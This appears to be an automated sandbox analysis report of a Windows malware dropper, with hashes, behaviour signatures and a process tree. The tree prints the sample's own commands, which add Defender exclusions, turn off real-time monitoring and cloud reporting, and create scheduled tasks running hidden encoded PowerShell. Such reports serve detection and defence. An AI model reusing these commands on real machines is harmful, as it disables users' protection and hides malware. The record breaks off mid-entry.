Analysis

  • max time kernel
    241s
  • max time network
    242s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/03/2024, 22:28

General

  • Target

    509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe

  • Size

    7.5MB

  • MD5

    881037c3e333268c36bbb87aba7fbeba

  • SHA1

    448f9198f3fac3a0c038bed8a02a0b78cde2cfb1

  • SHA256

    509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80

  • SHA512

    0c79e6a612ba5959d3d73e7cb34f221fe20eabb680aa7b523d1237e5652edad7b10e2432d8195aa0f4758a59d9ca827ac2be2f7e5b74e794dfe87edef982d1db

  • SSDEEP

    196608:91O8er2zLmXh5u01Q9xqZHczyUe2bEKQNRPY+i:3O8ekiRo01T2+MKzPYv

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 21 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe
    "C:\Users\Admin\AppData\Local\Temp\509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Users\Admin\AppData\Local\Temp\7zS1600.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2368
      • C:\Users\Admin\AppData\Local\Temp\7zS17B5.tmp\Install.exe
        .\Install.exe /qdidBlVkf "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2752
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2880
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:2572
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2724
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:2460
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:2600
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gXOeMITWT" /SC once /ST 21:09:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:2428
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gXOeMITWT"
                  4⤵
                    PID:2480
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gXOeMITWT"
                    4⤵
                      PID:1840
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "btbwILgIDOMomJfKYB" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\hzbTtSU.exe\" RD /xssite_idmTA 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:1940
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {2BE43F0A-CE92-423D-8789-5CA4F33CA67E} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
                1⤵
                  PID:2556
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1712
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:2736
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      2⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3064
                      • C:\Windows\system32\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        3⤵
                          PID:1860
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:888
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          3⤵
                            PID:276
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                          2⤵
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2256
                          • C:\Windows\system32\gpupdate.exe
                            "C:\Windows\system32\gpupdate.exe" /force
                            3⤵
                              PID:2312
                        • C:\Windows\system32\gpscript.exe
                          gpscript.exe /RefreshSystemParam
                          1⤵
                            PID:1956
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {053F2CAA-A243-4480-ADCB-69D3623C1D26} S-1-5-18:NT AUTHORITY\System:Service:
                            1⤵
                              PID:1468
                              • C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\hzbTtSU.exe
                                C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\hzbTtSU.exe RD /xssite_idmTA 525403 /S
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:980
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gXEqSNUjU" /SC once /ST 02:41:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:1240
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gXEqSNUjU"
                                  3⤵
                                    PID:452
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gXEqSNUjU"
                                    3⤵
                                      PID:2444
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      3⤵
                                        PID:2508
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                          4⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:1624
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        3⤵
                                          PID:1568
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                            4⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            PID:2392
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "goejZIqJJ" /SC once /ST 17:12:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                          3⤵
                                          • Creates scheduled task(s)
                                          PID:1540
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /run /I /tn "goejZIqJJ"
                                          3⤵
                                            PID:2836
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "goejZIqJJ"
                                            3⤵
                                              PID:1676
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:804
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1488
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:1508
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1524
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:2224
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1388
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:2072
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:828
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\gtigoJAOxebpSqst\wcFgIAkr\KoxNlNXoGtRJCtKF.wsf"
                                                          3⤵
                                                            PID:1424
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\gtigoJAOxebpSqst\wcFgIAkr\KoxNlNXoGtRJCtKF.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:2024
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2020
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2080
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:864
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:540
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2580
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2676
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:588
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2400
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1240
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1780
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:844
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2332
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2620
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:3068
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1804
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:940
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:272
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:592
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:3004
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:1776
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:2016
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:1252
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:832
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2968
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:2452
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:2428
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:2392
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:1628
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:1660
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:1300
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                        PID:2492
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                          PID:1712
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:2344
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:800
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                                PID:1652
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                  PID:1788
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "gbsdSKdqS" /SC once /ST 09:01:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                3⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:2632
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "gbsdSKdqS"
                                                                                                3⤵
                                                                                                  PID:1752
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "gbsdSKdqS"
                                                                                                  3⤵
                                                                                                    PID:1912
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                    3⤵
                                                                                                      PID:2476
                                                                                                      • C:\Windows\SysWOW64\reg.exe
